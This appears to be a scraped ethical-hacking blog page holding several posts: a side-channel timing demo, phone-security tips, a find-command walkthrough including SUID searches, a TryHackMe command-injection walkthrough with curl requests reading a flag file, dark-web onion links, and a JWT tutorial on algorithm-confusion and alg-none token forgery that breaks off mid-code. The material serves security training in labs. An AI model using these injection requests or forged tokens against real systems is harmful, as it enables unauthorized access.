
ABOUT US

Our development agency is committed to providing you the best service.

OUR TEAM

The awesome people behind our brand ... and their life motto.

  • Kumar Atul Jaiswal

    Ethical Hacker

    Hacking is a Speed of Innovation And Technology with Romance.

  • Kumar Atul Jaiswal

    CEO Of Hacking Truth

    Loopholes are in every major security system; you just need to understand it well.

  • Kumar Atul Jaiswal

    Web Developer

    Technology is the best way to change everything, like a mindset or a goal.

OUR SKILLS

We pride ourselves with strong, flexible and top notch skills.

Marketing

Development 90%
Design 80%
Marketing 70%


ACHIEVEMENTS

We help our clients integrate, analyze, and use their data to improve their business.

  • 150 great projects
  • 300 happy clients
  • 650 coffees drunk
  • 1568 Facebook likes


PORTFOLIO

We pride ourselves on bringing a fresh perspective and effective marketing to each project.

  • What is a thing which cannot be hacked?

      

    What is a thing which cannot be hacked? by hackingtruth.in or kumaratuljaiswal.in

     

    "In simple words, all things that are not connected to the internet cannot be hacked."


    More precisely: yes, there are many very small systems that cannot be hacked.

    Hacking a system is like robbing a bank. If the bank is a 1 inch by 1 inch solid steel box kept inside my pocket, it really can’t be robbed.

    The larger the system, the more opportunities it has for a flaw or vulnerability that can be exploited, and that exploitation is what we call a hack.

    However, today's computer and digital systems are very complex. Even if you use a sound cryptographic primitive (e.g. AES), or a carefully designed and well-reviewed library (e.g. NaCl), you still have to run that code on an operating system and on sizable hardware, and both of those are attack surface in their own right.



    For example, did you know that even correctly implemented cryptography can become useless if an attacker can measure the power consumption of the hardware running it? The power trace reveals which operations ran on which data, and from that the key can be extracted. Attacks that exploit this kind of unintended physical or timing leakage, rather than a weakness in the algorithm itself, are called side-channel attacks.
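    The principle behind such attacks, as an added example that is not part of the original post: a secret comparison that stops at the first wrong byte leaks how far it got, and that one leaked number is enough to recover the whole secret a byte at a time. The secret and the "trace" (a count of bytes examined, standing in for a power or timing measurement) are constructed for the demo; the constant-time variant shows why the fix is to make the work independent of the data.

```python
"""Side-channel leakage modelled on a byte-by-byte secret comparison.

Added example (not from the original post). Instead of measuring power
or time, the "trace" is the number of bytes the comparison touched
before it stopped, which is exactly what a timing or power trace tells
an attacker about an early-exit compare. SECRET is a constructed value.
"""
import hmac

SECRET = b"hunter2!"  # constructed demo secret, unknown to the attacker


def leaky_compare(secret: bytes, guess: bytes):
    """Early-exit comparison. Returns (equal, bytes_examined).

    The second value stands in for the physical side channel: someone
    with a stopwatch or an oscilloscope learns how far the loop ran,
    even though they only ever see "accepted" or "rejected".
    """
    examined = 0
    for a, b in zip(secret, guess):
        examined += 1
        if a != b:
            return False, examined
    return len(secret) == len(guess), examined


def constant_time_compare(secret: bytes, guess: bytes):
    """Same interface, but hmac.compare_digest touches every byte regardless,
    so the trace is the same for every guess."""
    return hmac.compare_digest(secret, guess), len(secret)


def recover_secret(oracle, length: int) -> bytes:
    """Recover a secret of known length using the leaked count plus the
    accept/reject verdict. Each position costs at most 256 queries instead
    of 256**length for the whole secret: the candidate that makes the loop
    run one byte further (or finally succeed) is the right one."""
    known = bytearray()
    for pos in range(length):
        best_byte, best_score = 0, -1
        for candidate in range(256):
            # Pad the guess to full length so only position `pos` varies.
            guess = bytes(known) + bytes([candidate]) + b"\x00" * (length - pos - 1)
            ok, depth = oracle(guess)
            score = depth + (1 if ok else 0)  # a full match beats any partial one
            if score > best_score:
                best_byte, best_score = candidate, score
        known.append(best_byte)
    return bytes(known)


if __name__ == "__main__":
    print("leaky   :", recover_secret(lambda g: leaky_compare(SECRET, g), len(SECRET)))
    print("constant:", recover_secret(lambda g: constant_time_compare(SECRET, g), len(SECRET)))
```

    Against the leaky comparison the attacker gets the secret back in at most 256 × 8 queries; against the constant-time one every guess produces the same trace and the "recovered" value is garbage. Real measurements are noisy, so an attacker averages many traces per candidate, but the structure of the attack is exactly this.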




     

    EVM Voting In India

     

    EVMs (Electronic Voting Machines) are used in many countries to conduct elections, including India. Indian EVMs are standalone devices: no internet, no Bluetooth, no connection to any other device or network, so they cannot be attacked remotely. Many political parties have questioned the authenticity of the EVM, but when the Election Commission of India invited them to demonstrate a hack, none turned up. A device that is not connected to any network or other device can only be attacked by someone with physical access to it, so for an EVM the remaining question is physical custody rather than network security.



    Electronic Voting is the standard means of conducting elections using Electronic Voting Machines, sometimes called "EVMs" in India.[1][2] The use of EVMs and electronic voting was developed and tested by the state-owned Electronics Corporation of India and Bharat Electronics in the 1990s. They were introduced in Indian elections between 1998 and 2001, in a phased manner. The electronic voting machines have been used in all general and state assembly elections of India since 2004.



    Disclaimer



    This was written for educational purposes and pentesting only.
    The author will not be responsible for any damage.
    The author is not responsible for any misuse of the information.
    You will not misuse the information to gain unauthorized access.
    This information shall only be used to expand knowledge and not for causing malicious or damaging attacks. Performing any hacks without written permission is illegal.


    All videos and tutorials are for informational and educational purposes only. We believe that ethical hacking, information security and cyber security should be familiar subjects to anyone using digital information and computers. We believe that it is impossible to defend yourself from hackers without knowing how hacking is done. The tutorials and videos provided on www.hackingtruth.in are only for those who are interested in learning about ethical hacking, security, penetration testing and malware analysis. Hacking Truth is against misuse of this information and strongly advises against it. Please regard the word hacking as ethical hacking or penetration testing every time this word is used.


    All tutorials and videos have been made using our own routers, servers, websites and other resources, they do not contain any illegal activity. We do not promote, encourage, support or excite any illegal activity or hacking without written permission in general. We want to raise security awareness and inform our readers on how to prevent themselves from being a victim of hackers. If you plan to use the information for illegal purposes, please leave this website now. We cannot be held responsible for any misuse of the given information.



    - Hacking Truth by Kumar Atul Jaiswal



    I hope you liked this post; if so, don't forget to share it.
    Thank you so much :-)

     


  • My phone was hacked by some so what can I do


    We live in the 21st century, where the fear of being hacked is the number one worry among PC and phone users. Wireless technology and the rapid expansion of internet access to a wider audience also mean more prey for the predators who use the web as their hunting ground.
     

     

    Signs Someone Is Hacking Your Phone



    • Unknown apps: a compromised phone often has unfamiliar apps running in the background. Spyware is usually sideloaded rather than installed from the official app store, so an app you never installed is a red flag.


    • Constant low battery: malware that keeps collecting and uploading data drains the battery. A battery that dies quickly for no obvious reason is a sign something could be wrong.

     

    • Hot, hot, hot: does your phone feel hot even when you haven’t been using it? Extra background activity makes any device heat up.


    • Strange charges: are there charges on your phone bill that you don’t understand? Spyware that uploads location, recordings or other data in the background pushes your data usage (and, abroad, roaming charges) up.


    • Nonsensical text messages: some spyware accepts commands over SMS, so a compromised phone may receive texts that look like random characters or code.

     

    • Pop-ups: another sign is an increase in pop-ups you don’t remember agreeing to, for example for medicines, new phones or software.

     

     


     

     

     

    What To Do If Your Phone Is Hacked



    Delete Unknown Apps

    If you can’t remember installing an app and don’t know what purpose it serves, it’s safest to delete it. You’ll notice these apps running in the background despite never having seen or interacted with them. On Android, also check the lists of device admin apps and accessibility services, since spyware often registers itself there to resist removal.



    Use Antivirus Software

    There are plenty of good antivirus programs for every mobile operating system. They detect and remove known malware, although they are not a guarantee against everything. There are free versions available, but superior protection usually comes with a price tag.



    Keep Your Phone Updated


    Regular updates keep the phone’s defenses up, since most attacks rely on vulnerabilities that have already been patched. It may seem like an inconvenience, but ignoring that update could cost you in the long run. Take half an hour or so and update your phone.


    Check Your Phone Bill

    You may notice a higher monthly bill than normal if your phone is compromised, because the extra background activity raises your data usage. Go through your monthly statement with a fine-tooth comb, and get in touch with your service provider if you find charges you did not make.



    Factory Reset

    This should be a last resort. A factory reset clears ALL your data from the phone and restores it to its original default settings: your pictures, settings and everything else will be erased, and any malicious app goes with them. Back up the data you need first, but be careful about restoring apps from that backup, since that can reinstall the same malware. Afterwards, change the passwords of the accounts you used on the phone, because anything typed while it was compromised may already have been stolen.




    Ways To Prevent Future Hacking


    • Being proactive now will prevent future attacks from happening to you. Here are some ways in which to protect yourself.



    • Turn off Bluetooth when not in use: Bluetooth is a common way for attackers to reach target phones. BlueBorne, a set of Bluetooth vulnerabilities disclosed in 2017, allowed unpatched devices to be attacked over the air without any pairing.


    • Be wary of public Wi-Fi: anyone on the same open network can observe or tamper with unencrypted traffic, so it can be worth using your own mobile data to keep cybercriminals at bay.


    • Keep your phone updated: staying updated means your phone has the best defense available for your operating system.

     

    • Only use official apps: only install apps from the official app store. Apps from outside it are risky and tend to cause problems.


    • Create strong passwords: come up with something long, or better yet something nonsensical that nobody will guess, and use a different one for each account. Don’t use information about yourself like your name, address, or anything somebody might be able to look up.




    If you found this helpful, please don't forget to share this post!

     


     


  • Find command in linux to search a file and directories

     


     

    Find command in linux

     

    To be precise, the find command is used to search for files in a directory hierarchy. The man page has the full explanation, so here we will look at the tasks.


    When you know exactly what you’re looking for, you don’t need to search for it; you just have to find it.


    This tutorial will help you understand how to use the find command effectively in a CTF context. It is written so that you won’t have to refer to the man page to complete it, although I recommend the man page for further reading.


    The syntax of the command can be broken down as such:

     find where what 


    Firstly you tell the system to find something; secondly you tell it where to look; and finally, you tell it what to look for.

    You don’t need to specify where when you’re looking in your working directory. You can use wildcards as well, in specifying both a directory and a name.


    Note: There's no VM to deploy in this room. You only need to enter the commands that would be used to find what the questions ask for. You can also test the commands on your own terminal (if you have access to a Unix or Unix-like system) to check the output of find with different options. However, that's not necessary; this is a walkthrough, and everything you need to solve this room is in the tasks' description.


    On your terminal, execute the command:

    touch file-1 file-2

    This command will create two files, named file-1 and file-2 respectively, in your current working directory.


    Now, execute:

    find file*

    As you can see, the command outputs both of your files. (Note that it is the shell, not find, that expands the unquoted wildcard: find actually receives file-1 file-2 as its arguments and simply lists each starting point it was given.)


    This time, execute:

    find *1

    Only file-1 is in the output, because the shell expanded *1 to the only matching name.



    Be More Specific

     

    Most of the time, you won’t be looking for something in your working directory. The first argument of your find command should be the directory you want to search. The command will search in that directory and in all its subdirectories. So, if you want to search the whole filesystem, your command should begin with find /.


    Two very useful flags are -type and -name. With -type, you can use d to only find directories, and f to only find files. The -name flag is used to specify a name or pattern to look for. You can type the whole name, or use wildcards to specify only part(s) of the name. If you use wildcards, you need to enclose your pattern in quotes; otherwise the shell expands the wildcard before find sees it and the command won't work as intended. It is useful to know that you can also use the -iname flag, which is the same as -name but case insensitive.

    These flags are useful when you want to specify only part of the name of what you’re looking for.
     

     

    #1 Find all files whose name ends with ".xml"

    Ans: find / -type f -name "*.xml"

    #2 Find all files in the /home directory (recursive) whose name is "user.txt"

    Ans: find /home -type f -iname user.txt

    #3 Find all directories whose name contains the word "exploits"

    Ans: find / -type d -name "*exploits*"

     

     

    Know exactly what you're looking for


    In some situations, specifying just the name of a file will not be enough. You can also specify the owner, the size, the permissions, and the time the file was last accessed/modified as well.


    The username of the owner of a file is specified with the -user flag.


    The size of a file is specified with the -size flag. When using numerical values, the formats -n, +n, and n can be used, where n is a number. -n matches values less than n, +n matches values greater than n, and n matches values exactly n. To specify a size, you also need a suffix. c is the suffix for bytes, k for KiB, and M for MiB. So, if you want to specify a size less than 30 bytes, the argument -30c should be used. One caveat: with the k and M suffixes, find rounds the file size up to the next whole unit before comparing, so -size -2k matches files of at most 1 KiB and -size -1M matches only empty files; use c when you need an exact byte threshold.


    The -perm flag is used to specify permissions, either in octal form (e.g. 644) or in symbolic form (e.g. u=r). If you specify the permission mode as shown above (e.g. 644 or u=r), then find will only return files with exactly those permissions. You can use the - or / prefix to make your search more inclusive. Using the - prefix will return files with at least the permissions you specify; this means that the -444 mode will match files that are readable by everyone, even if someone also has write and/or execute permissions. Using the / prefix will return files that match any of the permissions you have set; this means that the /666 mode will match files that are readable or writeable by at least one of the classes (owner, group, or others).


    Lastly, time-related searches will be covered. These are more complex but may prove useful. The flag consists of a word and a prefix. The words are min and time, for minutes and days, respectively. The prefixes are a, m, and c, and are used to specify when a file was last accessed, modified, or had its status changed. As for the numerical values, the same rules as for the -size flag apply, except there is no suffix. To put it all together: in order to specify that a file was last accessed more than 30 minutes ago, the option -amin +30 is used. To specify that it was modified less than 7 days ago, the option -mtime -7 is used. (Note: when you want to specify that a file was modified within the last 24 hours, the option -mtime 0 is used, because find truncates the age to whole days before comparing.)
     

     
    #1 Find all files owned by the user "kittycat"

    Ans: find / -type f -user kittycat


    #2 Find all files that are exactly 150 bytes in size

    Ans: find / -type f -size 150c


    #3 Find all files in the /home directory (recursive) with size less than 2 KiB’s and extension ".txt"


    Ans: find /home -type f -size -2k -name "*.txt"

     

    #4 Find all files that are exactly readable and writeable by the owner, and readable by everyone else (use octal format)


    Ans: find / -type f -perm 644


    #5 Find all files that are only readable by anyone (use octal format)

    Ans: find / -type f -perm /444


    #6 Find all files with write permission for the group "others", regardless of any other permissions, with extension ".sh" (use symbolic format)

    Ans: find / -type f -perm -o=w -name "*.sh"


    #7 Find all files in the /usr/bin directory (recursive) that are owned by root and have at least the SUID permission (use symbolic format)



    Ans: find /usr/bin -type f -user root -perm -u=s

    #8 Find all files that were not accessed in the last 10 days with extension ".png"


    Ans: find / -type f -atime +10 -name "*.png"

    #9 Find all files in the /usr/bin directory (recursive) that have been modified within the last 2 hours

    Ans: find /usr/bin -type f -mmin -120
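    To check what the options above actually match without a VM, here is an added example (not from the original tutorial, and not findutils code) that re-implements find's matching rules for -type, -name/-iname, -user, -size, -perm, -mtime and -mmin in Python and runs them over a constructed in-memory listing; the paths, sizes, owners and ages are made up. It also encodes the rule the tutorial glosses over: sizes given in k, M or G are rounded up to whole units before the comparison.

```python
"""A small re-implementation of find's matching rules (added example, not
findutils and not the original tutorial's code). FILES is a constructed
listing standing in for the filesystem."""
import fnmatch
import stat
from dataclasses import dataclass

UNIT = {"c": 1, "k": 1024, "M": 1024 ** 2, "G": 1024 ** 3, "b": 512}  # b is find's default
WHO = {"u": 0o700, "g": 0o070, "o": 0o007, "a": 0o777}
PERM_BITS = {"r": 0o444, "w": 0o222, "x": 0o111}
SPECIAL = {("u", "s"): stat.S_ISUID, ("g", "s"): stat.S_ISGID, ("o", "t"): stat.S_ISVTX}


@dataclass
class Entry:
    path: str
    kind: str      # "f" regular file, "d" directory (what -type checks)
    size: int      # bytes
    mode: int      # permission bits, e.g. 0o644 or 0o4755
    user: str
    age_sec: int   # seconds since last modification


def parse_mode(spec: str) -> int:
    """'644' -> 0o644; 'u=rw,g=r,o=r' -> 0o644; 'u=s' -> 0o4000; 'o=w' -> 0o002."""
    if spec.isdigit():
        return int(spec, 8) & 0o7777
    bits = 0
    for clause in spec.split(","):
        who, perms = clause.split("=")
        for w in who:
            for p in perms:
                if (w, p) in SPECIAL:
                    bits |= SPECIAL[(w, p)]
                elif p in PERM_BITS:
                    bits |= PERM_BITS[p] & WHO[w]
                else:
                    raise ValueError(f"unsupported permission {clause!r}")
    return bits


def perm_match(mode: int, spec: str) -> bool:
    """-perm MODE (exact), -perm -MODE (all given bits set), -perm /MODE (any bit set)."""
    mode &= 0o7777
    if spec.startswith("-"):
        want = parse_mode(spec[1:])
        return mode & want == want
    if spec.startswith("/"):
        want = parse_mode(spec[1:])
        return want == 0 or mode & want != 0
    return mode == parse_mode(spec)


def _compare(value: int, spec: str) -> bool:
    """Shared [+-]N rule: +N greater than, -N less than, N exactly."""
    if spec.startswith("+"):
        return value > int(spec[1:])
    if spec.startswith("-"):
        return value < int(spec[1:])
    return value == int(spec)


def size_match(size_bytes: int, spec: str) -> bool:
    """-size [+-]N[ckMGb]: the size is rounded UP to whole units first,
    so '-2k' means 'at most 1 KiB' and '-1M' matches only empty files."""
    unit = spec[-1] if spec[-1] in UNIT else "b"
    units = -(-size_bytes // UNIT[unit])  # integer ceiling
    return _compare(units, spec.rstrip("ckMGb"))


def time_match(age_sec: int, spec: str, unit_sec: int) -> bool:
    """-mtime/-atime count 86400-second units, -mmin/-amin 60-second units; the
    age is truncated to whole units, so '-mtime 0' means within the last 24h."""
    return _compare(age_sec // unit_sec, spec)


def find(entries, start="/", kind=None, name=None, iname=None, user=None,
         size=None, perm=None, mtime=None, mmin=None):
    """Apply the criteria the way 'find START -type ... -name ...' would."""
    prefix = start.rstrip("/") + "/"
    hits = []
    for e in entries:
        base = e.path.rsplit("/", 1)[-1]
        if not (e.path == start or e.path.startswith(prefix)):
            continue
        if kind and e.kind != kind:
            continue
        if name and not fnmatch.fnmatchcase(base, name):
            continue
        if iname and not fnmatch.fnmatchcase(base.lower(), iname.lower()):
            continue
        if user and e.user != user:
            continue
        if size and not size_match(e.size, size):
            continue
        if perm and not perm_match(e.mode, perm):
            continue
        if mtime and not time_match(e.age_sec, mtime, 86400):
            continue
        if mmin and not time_match(e.age_sec, mmin, 60):
            continue
        hits.append(e.path)
    return hits


FILES = [  # constructed sample listing
    Entry("/home/bestadmin/user.txt", "f", 21, 0o644, "bestadmin", 3 * 3600),
    Entry("/home/kittycat/notes.txt", "f", 1024, 0o600, "kittycat", 40 * 86400),
    Entry("/home/kittycat/big.txt", "f", 1025, 0o644, "kittycat", 5 * 86400),
    Entry("/usr/bin/passwd", "f", 68208, 0o4755, "root", 400 * 86400),
    Entry("/usr/bin/backup.sh", "f", 150, 0o776, "root", 90 * 60),
    Entry("/opt/exploits", "d", 4096, 0o755, "root", 10 * 86400),
]
```

    Running the answers above against FILES, for example find(FILES, "/home", kind="f", size="-2k", name="*.txt"), shows the rounding rule in action: the 1024-byte notes.txt matches, the 1025-byte big.txt does not, because 1025 bytes rounds up to 2 KiB.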


     

    To conclude this tutorial, there are two more things that you should know of. The first is that you can use the redirection operators with the find command. With > you can save the results of the search to a file, and more importantly, you can suppress the error messages to make the output more readable. This is done by appending 2> /dev/null to your command. This way, you won’t see the "Permission denied" errors for the directories you’re not allowed to read, only the matches.


    The second thing is the -exec flag. You can use it in your find command to execute a new command on each result, following the -exec flag, like so: -exec whoami \;. The {} placeholder stands for the current result, so -exec ls -l {} \; runs ls on every file found. The possibilities enabled by this option are beyond the scope of this tutorial, but most notably it can be used for privilege escalation whenever find itself runs with elevated privileges (for example through sudo or the SUID bit).
     

     


     

  • TryHackMe advent of cyber command injection walkthrough

     

    command injection

     

     

    Depending on its functionality, a web application may need to interact with the underlying host system. This is usually done by passing raw system commands or user input to a command shell, either directly or through some library.

    Examples of when web applications interact with host systems include:


    • checking monitoring statistics, e.g. RAM in use or free disk space;
    • file conversion processes, e.g. the web application receives an image file that it wants to convert to a different image type;
    • debug functionality left open; some frameworks have optional debug features that interact with the underlying file system.


    Any input that is controlled by a user shouldn’t be trusted by the server, because user input can be manipulated. When a web application builds system commands from that input, a user can manipulate it to execute arbitrary system commands. This type of attack is called command injection.



    Command Injection


    If a web application takes input supplied by a user and makes it part of a command that is used within a shell, it allows an adversary to inject arbitrary operating system commands.


    Instructions


    • Another day, another hack from the Christmas Monster. Can you get back control of the system?
    • Access the web server on http://[your-ip]:3000/
    • McSkidy actually found something interesting on the /api/cmd endpoint.



    In the browser (using command injection)



     

    After trying a few injection methods, I found that the following request was returning something interesting. Note that this endpoint simply executes whatever follows /api/cmd/, so no shell metacharacter was needed to break out of an existing command; in most real applications you would first have to append something like ; or | or $( ) to the input the application expects.


    In Terminal


    $ curl -s http://10.10.15.73:3000/api/cmd/ls 

    {"stdout":"bin\nboot\ndata\ndev\netc\nhome\nlib\nlib64\nlocal\nmedia\nmnt\nopt\nproc\nroot\nrun\nsbin\nsrv\nsys\ntmp\nusr\nvar\n","stderr":""}




    Following the logic, I was able to locate the home directory, and found the user.txt file:



    $ curl -s http://10.10.15.73:3000/api/cmd/ls%20%2Fhome
    {"stdout":"bestadmin\nec2-user\n","stderr":""}


     

    $ curl -s http://10.10.15.73:3000/api/cmd/ls%20%2Fhome%2Fbestadmin
    {"stdout":"bin\nnew-room\nrun.sh\nuser.txt\n","stderr":""}


     

    I then changed from ls to cat to show the content of the flag:

     

    $ curl -s http://10.10.15.73:3000/api/cmd/cat%20%2Fhome%2Fbestadmin%2Fuser.txt
    {"stdout":"5W7WkjxBWwhe3RNsWJ3Q\n","stderr":""}


     

     

    Answer: 5W7WkjxBWwhe3RNsWJ3Q
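    The bug behind this room in code form, as an added example that is not the TryHackMe application's code: the vulnerable function concatenates user input into a shell string the way an endpoint like /api/cmd/<input> would, and the two hardened versions keep the input away from the shell. The base command ls, the allow-list and the payload are assumptions for the demo.

```python
"""Command injection: the vulnerable pattern beside the hardened one.

Added example, not the TryHackMe application's code. 'ls' as the base
command, ALLOWED_TARGETS and the payload are assumptions for the demo.
"""
import subprocess


def run_vulnerable(user_input: str) -> dict:
    """String concatenation + shell=True: /bin/sh parses the whole string,
    so ; | & $( ) and backticks inside USER_INPUT start new commands."""
    result = subprocess.run(f"ls {user_input}", shell=True,
                            capture_output=True, text=True)
    return {"stdout": result.stdout, "stderr": result.stderr}


def run_no_shell(user_input: str) -> dict:
    """Argument vector, no shell: the input becomes a single argv entry for ls,
    so '/tmp; echo INJECTED' is just an odd directory name, not a command."""
    result = subprocess.run(["ls", user_input], capture_output=True, text=True)
    return {"stdout": result.stdout, "stderr": result.stderr}


ALLOWED_TARGETS = {".", "/tmp"}   # assumption: the only paths this feature needs


def run_hardened(user_input: str) -> dict:
    """Defence in depth: validate against an allow-list first, then still avoid
    the shell. Rejected input never reaches subprocess at all."""
    if user_input not in ALLOWED_TARGETS:
        return {"stdout": "", "stderr": "rejected: target not in allow-list"}
    return run_no_shell(user_input)


if __name__ == "__main__":
    payload = "/tmp; echo INJECTED"
    print("vulnerable:", run_vulnerable(payload))
    print("no shell:  ", run_no_shell(payload))
    print("hardened:  ", run_hardened(payload))
```

    The JSON-shaped return value mirrors the {"stdout": ..., "stderr": ...} responses seen above. Only the first function ever prints INJECTED; the argv version fails with "cannot access" because ls was asked for a directory literally named "/tmp; echo INJECTED", and the allow-listed version refuses before anything runs.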

     

     



     

     

  • Top 3 scariest dark web search engines




     

    This kind of search engine is run in a businesslike way too. There's a CAPTCHA to keep bots out, and since its introduction it has shipped a number of updates and added new features and services: the search algorithm has been updated for faster searches, the advertising system now lets users bid on listings directly, and it even includes its own beta Bitcoin mixer to anonymize transactions.





    1. Torch



    website url: xmh57jrzrnw6insl

    Torch is one of the most popular and most applauded deep web search engines in existence. It claims to have been live since 1996, and the dark corners of the internet do not let anything live that long without quality.

    It’s also extremely simple: there’s the logo, and the search bar. It does display ads, but they’re not based on your cookies or cache; they are static ads which are the same for everyone.

    It also claims to have over 1 million pages indexed in its database, which I suppose is enough for most of us.







    2. The Dark Lair


    Darkweb website - The Dark Lair

    Link: http://vrimutd6so6a565x.onion/index.php/Board

    The Dark Lair was initially an image hosting platform and evolved into a social network over time. You can share images, post comments, and engage with other users as both a registered as well as anonymous user.







    3. Darkweb website - Duck Duck Go


    Link: http://3g2upl4pq6kufc4m.onion/

    Do you want to search for something privately? Then, DuckDuckGo is one of the best alternatives to Google. Your search activity isn’t stored, and you get decent answers for most queries without all the tracking. The search engine is also available on the dark web and offers an additional layer of anonymity and privacy with fast search results.

     




     


    hackingtruth.in does not promote or endorse claims that have been made by any parties in this article. The information provided here is for general purposes only and is not intended to promote or support the purchase or sale of any products or services, or to serve as a recommendation to get involved in doing so. Neither KumarAtulJaiswal (hackingtruth.in) nor any member is responsible, directly or indirectly, for any loss or damage caused or alleged to be caused by or in relation to reliance on or use of any content, goods or services mentioned in this article/video.

     

  • TryHackMe JWT Json Web Tokens

     


     

     

    JSON Web Tokens are an interesting case, because JWT itself is not a vulnerability. In fact it is a popular and, if done right, very secure method of authentication. The basic structure of a JWT is header.payload.signature: the header and payload are base64url-encoded JSON, and the signature is computed over both of them with something only the server should hold, either a shared secret (HS256) or a private key (RS256), so that the server can tell if the data was changed along the way.



    So an example JWT token would look like

    eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.SflKxwRJSMeKKF2QT4fwpMeJf36POk6yJV_adQssw5c


    This means that if we can produce a valid signature, we can control the data. To do that we need to understand the header: a typical JWT header looks like {"typ":"JWT","alg":"RS256"}. We're interested in the alg field. RS256 signs with a private RSA key that only the server has, so we cannot forge that. However, we can change the field to HS256, which is an HMAC with a shared secret, and a vulnerable verifier that dispatches on whatever alg the token names will then use the key it was configured with, the server's RSA public key, as that HMAC secret. If we have the public key, which in certain circumstances we do, we can sign our own tokens with it.


    Manual JWT Exploitation

    We start off with a basic application




    With a JWT, and a JWT verifier. Sending it garbage results in a failure, so let's try decoding the JWT.






    Decoding the JWT gives us our header, payload, and a bunch of binary data which is the signature.
     





    Unfortunately it seems the algorithm is RS256, which we cannot forge without the server's private key. Fortunately for us, this server leaves its public key lying around, which means we can change the algorithm and produce a new signature! The first step is to change the algorithm in the header to HS256, and then re-encode the header in base64.

     

    Our new JWT is eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJodHRwOi8vbG9jYWxob3N0IiwiaWF0IjoxNTg1MzIzNzg0LCJleHAiOjE1ODUzMjM5MDQsImRhdGEiOnsiaGVsbG8iOiJ3b3JsZCJ9fQ.FXj9F1jIXlhMyoQAo5-XPOiZeP4Ltw5XXZGqgX49tKkYUOeirOXUDgWL4bqP9nRXIODqOByqS_9O11nQN5bC_LTpfBWG2WZXg0tKIDAbKTxVkrytXBmOkP1qRK_Apv-CQs-mouuS1we8SHYShW_r4DEj0qAF3dsWVVzbRWNMH4Oc_odHNogv00dVlABcxMyXFpNJbeRS6-GCS-A4SFM32gMv_mkfkXrQPdejKDU_sKZrD5VVAmDlu0BainIvD28l8uV3OCc37shtPW0TKoIwUXmGsFYouKqk-h0dz4aTBLKJk7L64XdrA7ts1oOtzk8KqV6gnqXDXUNkzDX3qd9JKA


    The next step is to convert the public key to hex so openssl will use it.





    (Explanation: a is the file with the public key, xxd -p turns the contents of a file to hex, and tr is there to get rid of any newlines)

    The next step is to use openssl to compute the HS256 signature (an HMAC-SHA256) over header.payload using that key.




    Everything is going just fine so far! The final step is to decode that hex to binary data and re-encode it in base64url; luckily Python makes this really easy for us.




    That's our final signature; now we just put it where the signature should go, and the server should accept it.

    So our final JWT would be eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.<payload>.<new signature>




    Automatic JWT exploitation


    Because JWT tokens often expire, there is no guarantee that the public key can be found in time, and the payload of the token cannot be kept consistent from one attempt to the next, so there are no tools that blindly exploit JWT vulnerabilities in general. JWT vulnerabilities have to be exploited on a case by case basis.

    That doesn't mean you can't write a script that does everything automatically for a specific website you know is vulnerable; it's just that by the time you have finished it, you could already have exploited the vulnerability by hand.


    Challenge!


    The challenge is effectively the exact same application shown in the Manual exploitation section. If you succeed in exploiting it, you will get the flag!

    The public key can be found at /public.pem.

    Generated JWT tokens will also expire after a certain amount of time, so if you don't get it the first try, try doing it faster!




    Intro


    In addition to the previous vulnerability, certain JWT libraries have another devastating one. Besides RS256 and HS256, which we have already studied, the JWT standard defines an algorithm named none. According to the RFC, none means the token is unsecured: it carries no signature at all, and it is only meant for cases where something other than the JWT itself stops people from spoofing the data.


    RFC: RFC 7519 (JSON Web Token), section 6 "Unsecured JWTs", and RFC 7518 (JSON Web Algorithms), section 3.6 "Using the Algorithm none".


     



    Unfortunately certain JWT libraries clearly didn't read the RFC, which allows an attacker to switch the algorithm to none, in the same way one switches from RS256 to HS256, and have the token accepted as completely valid without even needing to compute a signature.


    #1 Remember to read the RFC when you're developing a library.


    Manually exploiting the JWT None vuln

    We start off with a simple login application.




    Logging in gives us a user screen, as well as a JWT token.




    Let's examine that token in the wonderful site jwt.io





    (Very nice site btw, definitely recommend for all your jwt needs)

    Now let's try changing the alg field to none, getting rid of the signature, and changing the role to admin. That leaves us with this final JWT token: eyJ0eXAiOiJKV1QiLCJhbGciOiJub25lIn0.eyJhdXRoIjoxNTg1MzQ1ODg0MjA0LCJhZ2VudCI6Ik1vemlsbGEvNS4wIChYMTE7IExpbnV4IHg4Nl82NDsgcnY6NjguMCkgR2Vja28vMjAxMDAxMDEgRmlyZWZveC82OC4wIiwicm9sZSI6ImFkbWluIiwiaWF0IjoxNTg1MzQ1ODg0fQ.

    The interesting thing is that we still need the second . to mark where the signature would be, even though nothing follows it. Let's try popping that token in where the cookie is supposed to be.




    Automatic Exploitation


    There is no tool that can check the library, get the token, and confirm that it is vulnerable, so you're going to have to do this manually. The header for the JWT none vuln is always the same though, which helps you out. Here's the header

    eyJ0eXAiOiJKV1QiLCJhbGciOiJub25lIn0

    Which decodes to {"typ": "JWT", "alg": "none"}
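The two header-driven attacks in this post, the RS256 to HS256 key confusion walked through above and the alg none bypass in this section, come down to the same library mistake: the verifier reads alg from the attacker-controlled header and runs whatever it says with the key the server handed in. The Python below is an added example, not code from the TryHackMe room or from this post. It forges both kinds of token with only the standard library and checks them against a model of a vulnerable verifier and of a pinned one. The PEM bytes, the victim token, its dummy RSA signature and the claim values are all constructed for the example; on the real target the key would come from /public.pem.

```python
import base64
import hashlib
import hmac
import json

# Stand-in for the server's /public.pem. Not a real RSA key: for the HS256
# confusion only the raw file bytes matter, because they become the HMAC secret.
# The trailing newline is deliberate. `xxd -p a | tr -d '\n'` hex-encodes the
# whole file, newline included, so the key must be the file's exact bytes.
PUBLIC_KEY_PEM = (
    b"-----BEGIN PUBLIC KEY-----\n"
    b"constructed-placeholder-not-a-real-key\n"
    b"-----END PUBLIC KEY-----\n"
)


def b64url_encode(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def decode_header(token: str) -> dict:
    return json.loads(b64url_decode(token.split(".")[0]))


def decode_payload(token: str) -> dict:
    return json.loads(b64url_decode(token.split(".")[1]))


def encode_part(obj: dict) -> str:
    return b64url_encode(json.dumps(obj, separators=(",", ":")).encode())


def hs256(signing_input: bytes, key: bytes) -> bytes:
    # Same computation as the openssl step: HMAC-SHA256 over "header.payload".
    return hmac.new(key, signing_input, hashlib.sha256).digest()


def make_rs256_token(payload: dict) -> str:
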